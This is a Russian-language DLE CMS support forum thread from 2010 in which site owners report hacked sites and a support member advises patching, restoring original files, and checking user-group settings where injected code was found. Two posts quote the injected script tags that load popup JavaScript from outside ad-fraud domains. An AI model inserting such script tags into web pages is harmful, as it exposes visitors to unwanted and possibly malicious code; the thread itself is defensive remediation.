ultroff 0 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Сегодня при заходе на свой сайт обнаруживаю всплывающее окно. В кеще страниц вижу многократно прописанный код типа: <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table> Защита от шеллов прописана. Что можно сделать? Обыскал все файлы, нет изменений, удаляю кеш страниц, генерится новый, опять со скриптами Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Смотрите темы: http://forum.dle-news.ru/index.php?showtopic=53254 http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe также удаляйте сторонние скрипты со своего сервера, у вас их там много.Более того на сайте не установлены патчи безопасности, вышедшие еще несколько месяцев назад http://dle-news.ru/bags/ в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html Ставьте патчи, восстанавливайте оригинальные файлы скрипта, проверяйте и удаляйте лишних администраторов, проверяйте раздел управления рекламой в админпанели. Ссылку на ваш сайт удалил, т.к. он уязвим. Цитата Ссылка на сообщение Поделиться на других сайтах
ultroff 0 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Автор этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html предыдущие багфиксы, да, пропустил администратор всего один, скриптов два, оба платные, раздел рекламы почистил сразу же рою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html Ничего у вас не стоит, я проверял ваш сайт полчаса назад, когда смотрел ваш сайт и этот патч установлен не был. Поэтому как вы его устанавливали я не знаюрою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить? смотрите кстати настройки групп, код мог быть прописан в префикс у группы.скриптов два, оба платные, это ничего не значит Цитата Ссылка на сообщение Поделиться на других сайтах
ultroff 0 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Автор Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку. Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку. Как не в этом? Еще как в этом. Вы поймите, я не строю предположения ставили ли вы патч или нет, я захожу на ваш сайт и проверяю, подвержен он уязвимости или нет. Так вот ваш сайт подвержен, т.е. патч не стоит 100%, и вам не спорить нужно, а срочно ставить патч. Я вот даже сейчас проверил еще раз, и ничего на данный момент у вас не стоит. Ставьте патч незамедлительно иначе все ваши действия ничем вам не помогут. Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно? необязательно, этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах. Датами файлов можно легко управлять через шелл, поэтому на изменения даты даже не смотрите, она может не меняться. 2 Цитата Ссылка на сообщение Поделиться на других сайтах
ultroff 0 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Автор Не спорю, патч скачал, установил. этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах нашелся! и действительно вставлен в настройки групп! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Не спорю, патч скачал, установил. теперь у вас поиск не работает. Читайте внимательно в новости Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше. у вас же не версия 9.0, вам вручную нужно вносить изменения в файлы, которые указаны в данной новости, а не копировать файлы от 9.0Восстановите опять оригинальные файлы от вашей версии скрипта, и вносите изменения в файлы вручную как указано. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
ultroff 0 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 Автор да, невнимательность подвела, редактировал только fullsearch, про search забыл. Ну чтоже, огромный респект вам, большое спасибо! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 22 ноября 2010 Рассказать Опубликовано: 22 ноября 2010 ultroff, Теперь все нормально, патч стоит. Цитата Ссылка на сообщение Поделиться на других сайтах
Tibet 0 Опубликовано: 7 декабря 2010 Рассказать Опубликовано: 7 декабря 2010 <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table> У меня такая же хрень - теперь буду во время обновляться! Вдобавок нашёл у себя в папке с софтом, который вручную заливал (эту папку антивирус DLE не сканил) - порядка 1000 страниц-дорвеев на всякие поиски-по-базам.ру фамилий людей и тд. Так что народ ищите сюрпризы во всех папках, которые не сканирует антивирус DLE! Вот еще мне помогает проверка сайта на вирусы на 2ip.ru - может тоже кому пригодится. И у меня вопрос по обновлению движка версии 7.3. Летом мне переносили сайт на другой сервер - и с тех пор у одного сайта почему-то нельзя в почти всех папках удалять/переименовывать файлы, менять им права и тд. В принципе всё работает, меня пока всё устраивает, просто не хочу дёргать хостера... Но из-за этого нельзя пропатчить движок, закрыв уязвимости. Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 7 декабря 2010 Рассказать Опубликовано: 7 декабря 2010 Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет? Нет, все зависит от причин. У пользователя FTP прав может и не быть, а у веб быть, опять таки патчи безопасности предотврящают попадание злоумышленника в базу данных. Цитата Ссылка на сообщение Поделиться на других сайтах
Sarvan 35 Опубликовано: 7 декабря 2010 Рассказать Опубликовано: 7 декабря 2010 У кого на сервере ProFTPD стоит, тоже очень актуально. Много людей пострадало за последнее время. http://www.opennet.ru/opennews/art.shtml?num=28866 http://www.opennet.ru/opennews/art.shtml?num=28476 Цитата Ссылка на сообщение Поделиться на других сайтах
fortune7 1 Опубликовано: 28 декабря 2010 Рассказать Опубликовано: 28 декабря 2010 Братцы! Ломанули сайт лицуха _http://kurdistan-post.ru, залили шел во все папки с правами 777, что делать? Пока поменял все на 755, будет ли движок с такими правами функционировать? Как оберечься от дальнейших вредных действий!? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 067 Опубликовано: 28 декабря 2010 Рассказать Опубликовано: 28 декабря 2010 fortune7, Первое что нужно сделать, это удалить все посторонние модификации и скрипты с сервера, восстановить оригинальные файлы на сервере из архива дистрибутива.Также проверить что на вашем сервере установлена актуальная версия phpMyAdmin, и если это не так, то обновить до актуальной версии. Послее время шеллы заливают через него, т.к. в нем обнаружена серьезная уязвимость. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.